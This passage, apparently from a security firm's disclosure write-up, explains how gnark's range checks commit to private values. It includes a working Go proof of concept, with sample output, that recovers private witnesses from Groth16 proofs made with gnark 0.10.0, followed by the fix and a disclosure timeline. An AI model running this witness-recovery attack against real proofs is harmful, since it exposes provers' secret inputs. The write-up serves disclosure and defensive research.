if !ok {
return nil, fmt.Errorf("failed to type assert to []bn254.G1Affine")
}

return basisFieldConcrete, nil
}

The output of running the above program is as follows:

13:24:12 INF compiling circuit
13:24:12 INF parsed circuit inputs nbPublic=0 nbSecret=1
13:24:12 INF building constraint builder nbConstraints=2
13:24:12 DBG constraint system solver done nbConstraints=2 took=0.692767
13:24:12 DBG prover done acceleration=none backend=groth16 curve=bn254 nbConstraints=2 took=2.056221
Commitment equal to secret times commitment key basis element: true
13:24:12 DBG verifier done backend=groth16 curve=bn254 took=3.246638

Range Checks in gnark

While commitments can be used directly in gnark, the most common way a gnark circuit might use commitments is via the standard library’s range checker, which uses commitments internally. Recall the example of a circuit proving knowledge of a decomposition of a number into nontrivial factors that we discussed at the start of the article. In that circuit, the constraints were defined as follows:

func (circuit *ExampleCircuit) Define(api frontend.API) error {
api.AssertIsEqual(circuit.N, api.Mul(circuit.A, circuit.B)) // N = A*B
api.AssertIsDifferent(circuit.A, 0) // A != 0
api.AssertIsDifferent(circuit.A, 1) // A != 1
api.AssertIsDifferent(circuit.B, 0) // B != 0
api.AssertIsDifferent(circuit.B, 1) // B != 1
rangeChecker := rangecheck.New(api)
rangeChecker.Check(circuit.A, bitnum) // 0 <= A < 2^bitnum
rangeChecker.Check(circuit.B, bitnum) // 0 <= B < 2^bitnum
return nil
}

Here, we already used a range check to check that the two factors are values that are at most bitnum bits wide. Such range checks are used quite often when writing circuits.

It is beyond the scope of this article to describe in detail how the range checks in the gnark standard library work: they involve lookups via the log-derivative argument, which in turn uses commitments. What matters for us here is what gets committed, which can be described as follows.

When we perform a range check on just a single value $x$, then $x$ is split into digits with respect to a base that is a power of two; in other words, we consider the binary representation of $x$ and split the bits into limbs of a certain width $\lambda$. Let $x_0, \dots, x_k$ denote the resulting base-$2^\lambda$ digits (i.e., limbs), ordered from least to most significant. We also need counts of how often each limb value appears: let $c_0, \dots, c_{2^\lambda - 1}$ be defined so that $c_i$ equals the number of limbs among $x_0, \dots, x_k$ that are equal to $i$. What will be committed is then $\left(x_0, \dots, x_k, c_0, \dots, c_{2^\lambda - 1}\right)$.

When there is more than one range check, then all range checks will share one commitment. The values committed to will be the concatenation of the limbs for the individual range checks, followed by the joint counts. So counts only occur once and cover all limbs from all range checks.

To give an example, say $\lambda = 2$, and we range check $x = 47$ and $y = 123$ to be at most eight bits wide. As $47 = 3 + 3\cdot 4 + 2\cdot 4^2$, the limbs for $x$ will be $\left(3, 3, 2, 0\right)$. For $y$, the limbs will be $\left(3, 2, 3, 1\right)$. The counts will be $\left(1, 1, 2, 4\right)$. So the values committed will be $\left(3, 3, 2, 0, 3, 2, 3, 1, 1, 1, 2, 4\right)$.

The following proof of concept contains the same circuit as the one for the factoring statement we discussed at the start of the article, though we add an additional commitment to each of the two private witnesses. We use bitnum = 8 and set $A$ and $B$ to random eight-bit values, setting $N = A \cdot B$ to satisfy the circuit constraints. After the proof has been created, we first use knowledge of the public instance $N$ to find all pairs $(A', B')$ that satisfy all constraints; usually, there will be more than one. The zero-knowledge property means that, knowing only the proof (and the setup data, including the proving key), it is supposed to be impossible to learn anything more about the actual values $(A, B)$ used by the prover, other than that the pair is an element of this list of satisfying assignments.

In the proof-of-concept code, we first use the commitments to the two private witnesses to extract their values individually, in a manner similar to the example from the previous subsection, though searching the entire space of numbers up to bitnum bits wide. We then use the commitment from the two range checks to again recover $A$ and $B$. This demonstrates how it is possible to recover private witnesses through range checks.

In practice, this attack is only feasible if the search space is small enough. Given that all range checks share a single commitment, most larger circuits likely perform enough range checks, even if the individual checks are on circuit variables with only a limited space of possible values, to make the combined search space intractably large.

package main

import (
"fmt"
"log"
"math/big"
"math/rand"
"reflect"
"unsafe"

"github.com/consensys/gnark-crypto/ecc"
"github.com/consensys/gnark-crypto/ecc/bn254"
"github.com/consensys/gnark-crypto/ecc/bn254/fr"
"github.com/consensys/gnark/backend/groth16"
groth16_bn254 "github.com/consensys/gnark/backend/groth16/bn254"
"github.com/consensys/gnark/frontend"
"github.com/consensys/gnark/frontend/cs/r1cs"
"github.com/consensys/gnark/std/rangecheck"
)

const bitnum = 8

// Here we define which circuit variables our circuit will have.
type ExampleCircuit struct {
A frontend.Variable // Private witness
B frontend.Variable // Private witness
N frontend.Variable `gnark:",public"` // Public instance
}

// This function defines the constraints for our circuit
func (circuit *ExampleCircuit) Define(api frontend.API) error {
api.AssertIsEqual(circuit.N, api.Mul(circuit.A, circuit.B)) // N = A*B
api.AssertIsDifferent(circuit.A, 0) // A != 0
api.AssertIsDifferent(circuit.A, 1) // A != 1
api.AssertIsDifferent(circuit.B, 0) // B != 0
api.AssertIsDifferent(circuit.B, 1) // B != 1
// We commit both private witnesses individually
commitCompiler, ok := api.Compiler().(frontend.Committer)
if !ok {
return fmt.Errorf("compiler does not commit")
}
_, err := commitCompiler.Commit(circuit.A)
if err != nil {
return err
}
_, err = commitCompiler.Commit(circuit.B)
if err != nil {
return err
}
// The following two range checks will together result in one more commitment
rangeChecker := rangecheck.New(api)
rangeChecker.Check(circuit.A, bitnum) // 0 <= A < 2^bitnum
rangeChecker.Check(circuit.B, bitnum) // 0 <= B < 2^bitnum
return nil
}

func main() {
// Compiles our circuit into a R1CS constraint system
var circuit ExampleCircuit
ccs, _ := frontend.Compile(ecc.BN254.ScalarField(), r1cs.NewBuilder, &circuit)

// Groth16 setup, generating the proving key and verification key
pk, vk, _ := groth16.Setup(ccs)

// Witness definition
secret_a := rand.Int63n(1 << bitnum)
secret_b := rand.Int63n(1 << bitnum)
n := secret_a * secret_b
fmt.Printf("\nUsing private witnesses a=%d, b=%d, with n=%d\n\n", secret_a, secret_b, n)
assignment := ExampleCircuit{A: secret_a, B: secret_b, N: n}
witness, _ := frontend.NewWitness(&assignment, ecc.BN254.ScalarField())
publicInstances, _ := witness.Public()

// Proving
proof, _ := groth16.Prove(ccs, pk, witness)

// Verifying
groth16.Verify(proof, vk, publicInstances)

// Converting proving key and proof to concrete types
pkConcrete, ok := pk.(*groth16_bn254.ProvingKey)
if !ok {
log.Fatal("unexpected type for proving key")
}
proofConcrete, ok := proof.(*groth16_bn254.Proof)
if !ok {
log.Fatal("unexpected type for proof")
}

// We first brute-force the search space to find all pairs (a,b) that are possible solutions of the constraints imposed by the circuit, given that we know n.
// The zero-knowledge property with regards to the proof implies that it should be impossible with only knowledge of the proof (and proving key) to find out anything additional about a and b except that (a,b) is among the found pairs.
fmt.Println("\nFinding all pairs (a,b) so that a*b =", n)
for guess_a := int64(0); guess_a < 1<<bitnum; guess_a++ {
for guess_b := int64(0); guess_b < 1<<bitnum; guess_b++ {
if guess_a*guess_b == n {
fmt.Println("Found a = ", guess_a, ", b =", guess_b)
}
}
}

// We now use the individual commitments to brute-force the exact values of a and b
println("\nSearching for secrets by using the solo commitments")
var guess_test bn254.G1Affine
basisPoints, err := getBasisField(&pkConcrete.CommitmentKeys[0])
if err != nil {
panic(err)
}
for guess := int64(0); guess < 1<<bitnum; guess++ {
guess_test.ScalarMultiplication(&basisPoints[0], big.NewInt(guess))
if guess_test == proofConcrete.Commitments[0] {
fmt.Println("Found secret a using the solo commitment: ", guess)
}
}

basisPoints, err = getBasisField(&pkConcrete.CommitmentKeys[1])
if err != nil {
panic(err)
}
for guess := int64(0); guess < 1<<bitnum; guess++ {
guess_test.ScalarMultiplication(&basisPoints[0], big.NewInt(guess))
if guess_test == proofConcrete.Commitments[1] {
fmt.Println("Found secret b using the solo commitment: ", guess)
}
}

// In practice, range checks are the most likely use through which circuits have commitments. We demonstrate here how to recover (a,b) using the commitment arising from the range checks.
println("\nSearching for secrets using the range check commitment")
basisPoints, err = getBasisField(&pkConcrete.CommitmentKeys[2])
if err != nil {
panic(err)
}
for guess_a := int64(2); guess_a < 1<<bitnum; guess_a++ {
for guess_b := int64(2); guess_b < 1<<bitnum; guess_b++ {
// We first get the base 4 limbs and limb counts for a and b separately
guess_list_a, counts_a := NumberToPartsAndCounts(big.NewInt(guess_a))
guess_list_b, counts_b := NumberToPartsAndCounts(big.NewInt(guess_b))
// The limb lists are just concatenated...
guess_list := append(guess_list_a[:], guess_list_b[:]...)
// ...but the counts need to be added.
counts := make([]*big.Int, 4)
for i := range 4 {
counts[i] = big.NewInt(counts_a[i] + counts_b[i])
}
guess_complete := append(guess_list, counts...)
guess_test, err = MultiScalarProduct(basisPoints, guess_complete)
if err != nil {
log.Fatal("MultiScalarProduct failed: ", err)
}
if guess_test == proofConcrete.Commitments[2] {
fmt.Printf("\nFound secrets using the range check commitment: a = %d, b = %d\n", guess_a, guess_b)
}
}
}

}

// Splits num into base-4 limbs and returns them in little-endian order as parts.
// It also returns counts, which contain how often each value from 0 to 3 occurs as a base-4 limb.
func NumberToPartsAndCounts(num *big.Int) (parts [bitnum / 2]*big.Int, counts [4]int64) {
base := new(big.Int).Lsh(big.NewInt(1), uint(2))
tmp := new(big.Int).Set(num)

for i := int64(0); i < bitnum/2; i++ {
scratch := big.NewInt(0)
scratch.Mod(tmp, base)
tmp.Rsh(tmp, uint(2))
parts[i] = scratch
counts[scratch.Int64()]++
}
return
}

// Wrapper to compute a multi-scalar product
func MultiScalarProduct(points []bn254.G1Affine, scalars []*big.Int) (bn254.G1Affine, error) {
if len(points) != len(scalars) {
return bn254.G1Affine{}, fmt.Errorf("points and scalars must have the same length")
}

// Convert []*big.Int to []fr.Element
convertedScalars := make([]fr.Element, len(scalars))
for i, scalar := range scalars {
convertedScalars[i].SetBigInt(scalar)
}

// Setup MultiExpConfig
config := ecc.MultiExpConfig{
NbTasks: 1,
}

// Call the MultiExp method
var result bn254.G1Affine
_, err := result.MultiExp(points, convertedScalars, config)
if err != nil {
return bn254.G1Affine{}, err
}

return result, nil
}

// getBasisField extracts the unexported basis field from a given ProvingKey.
// basis was renamed to Basis and thus made public in newer versions,
// however for gnark 0.10.0, a version of gnark-crypto is used in which the field was still private.
func getBasisField(commitmentPk interface{}) ([]bn254.G1Affine, error) {
// Reflect on the pointer
commitmentPkValue := reflect.ValueOf(commitmentPk)

if commitmentPkValue.Kind() != reflect.Ptr || commitmentPkValue.Elem().Kind() != reflect.Struct {
return nil, fmt.Errorf("expected a pointer to a struct")
}

// Access the 'basis' field
basisField := commitmentPkValue.Elem().FieldByName("basis")
if !basisField.IsValid() {
return nil, fmt.Errorf("field 'basis' not found")
}

if !basisField.CanInterface() {
// To access an unexported field, we need to bypass safety
basisField = reflect.NewAt(basisField.Type(), unsafe.Pointer(basisField.UnsafeAddr())).Elem()
}

basisFieldConcrete, ok := basisField.Interface().([]bn254.G1Affine)
if !ok {
return nil, fmt.Errorf("failed to type assert to []bn254.G1Affine")
}

return basisFieldConcrete, nil
}

An example output of the above program is as follows:

17:52:40 INF compiling circuit
17:52:40 INF parsed circuit inputs nbPublic=1 nbSecret=2
17:52:40 INF building constraint builder nbConstraints=21

Using private witnesses a=243, b=46, with n=11178

17:52:40 DBG constraint system solver done nbConstraints=21 took=2.178486
17:52:40 DBG prover done acceleration=none backend=groth16 curve=bn254 nbConstraints=21 took=4.871332
17:52:40 DBG verifier done backend=groth16 curve=bn254 took=3.202103

Finding all pairs (a,b) so that a*b = 11178
Found a = 46 , b = 243
Found a = 54 , b = 207
Found a = 69 , b = 162
Found a = 81 , b = 138
Found a = 138 , b = 81
Found a = 162 , b = 69
Found a = 207 , b = 54
Found a = 243 , b = 46

Searching for secrets by using the solo commitments
Found secret a using the solo commitment: 243
Found secret b using the solo commitment: 46

Searching for secrets using the range check commitment

Found secrets using the range check commitment: a = 243, b = 46

Fix for the Zero-Knowledge Issue

The zero-knowledge issue has been fixed in gnark 0.11.0. For each commitment, an additional private witness is created and appended to the list of circuit variables to commit to. A random value will be assigned to that additional private witness, thereby making the contribution of this extra private witness to the commitment point act as a blinding summand, just like in Pedersen commitments.

How We Found the Vulnerabilities

We encountered gnark’s extension to Groth16 during an audit for one of our clients, Nebra, who is building an aggregator to reduce gas costs for on-chain verification of proofs. The audit concerned changes made to their halo2 circuits performing batched verification of Groth16 proofs, to also support gnark’s extension. Digging into the background for this extension, we found the zero-knowledge issue. Later, when working on an early draft for this blog post and attempting to describe why the extension is sound, we realized that this was not actually the case with more than one commitment present.

Timeline

  • May 27, 2024 — We started our audit for Nebra that involved support for gnark’s extension to Groth16.
  • May 30, 2024 — We found the zero-knowledge vulnerability.
  • May 31, 2024 — We informed gnark about the zero-knowledge vulnerability.
  • June 20, 2024 — We found the soundness vulnerability while writing an early draft of this article.
  • June 20, 2024 — We informed gnark about the soundness vulnerability.
  • August 22, 2024 — Zero-knowledge vulnerability was fixed in commit afda68a.
  • August 27, 2024 — Soundness vulnerability was fixed.
  • September 6, 2024 — Version 0.11.0 of gnark, including the fixes, was released.

About Us

Zellic specializes in securing emerging technologies. Our security researchers have uncovered vulnerabilities in the most valuable targets, from Fortune 500s to DeFi giants.

Developers, founders, and investors trust our security assessments to ship quickly, confidently, and without critical vulnerabilities. With our background in real-world offensive security research, we find what others miss.

Contact us for an audit that’s better than the rest. Real audits, not rubber stamps.

Endnotes

  1. This can be seen as follows. The map $\varphi\colon \mathbb{F}_p^k \to \mathbb{F}_p, \left(r_0, \dots, r_{k-1}\right) \mapsto \sum_{i=0}^{k-1} r_i \cdot f_i - \sum_{i=0}^{k-1} r_i \cdot g_i$ is a linear map of $\mathbb{F}_p$ vector spaces. We assumed that there is a $j$ for which $f_j \neq g_j$, and one of the two values must be nonzero, which implies that $\varphi$ is not the zero map. Hence the image of $\varphi$ must have dimension $1$, and so the kernel of $\varphi$ must have dimension $k-1$ by the rank-nullity theorem. But the kernel of $\varphi$ consists exactly of the tuples we were looking for, so the ratio we were looking for is $\frac{p^{k-1}}{p^k} = \frac{1}{p}$.

  2. It is also possible to commit to public instances in gnark’s implementation, but we do not consider that case to simplify the exposition.

  3. For those who are familiar with the details of Groth16: this must hold separately for the two factors as well as the linear term in the quadratic arithmetic program that the Groth16 scheme is based upon and into which the higher-level commitments one might define in gnark are compiled. Essentially, this results in a linear relation holding for the polynomials $u_j$, for $v_j$, and for $w_j$ (Groth16’s notation), which implies that the linear relation also holds after evaluating at $x$, and hence for $L_j$.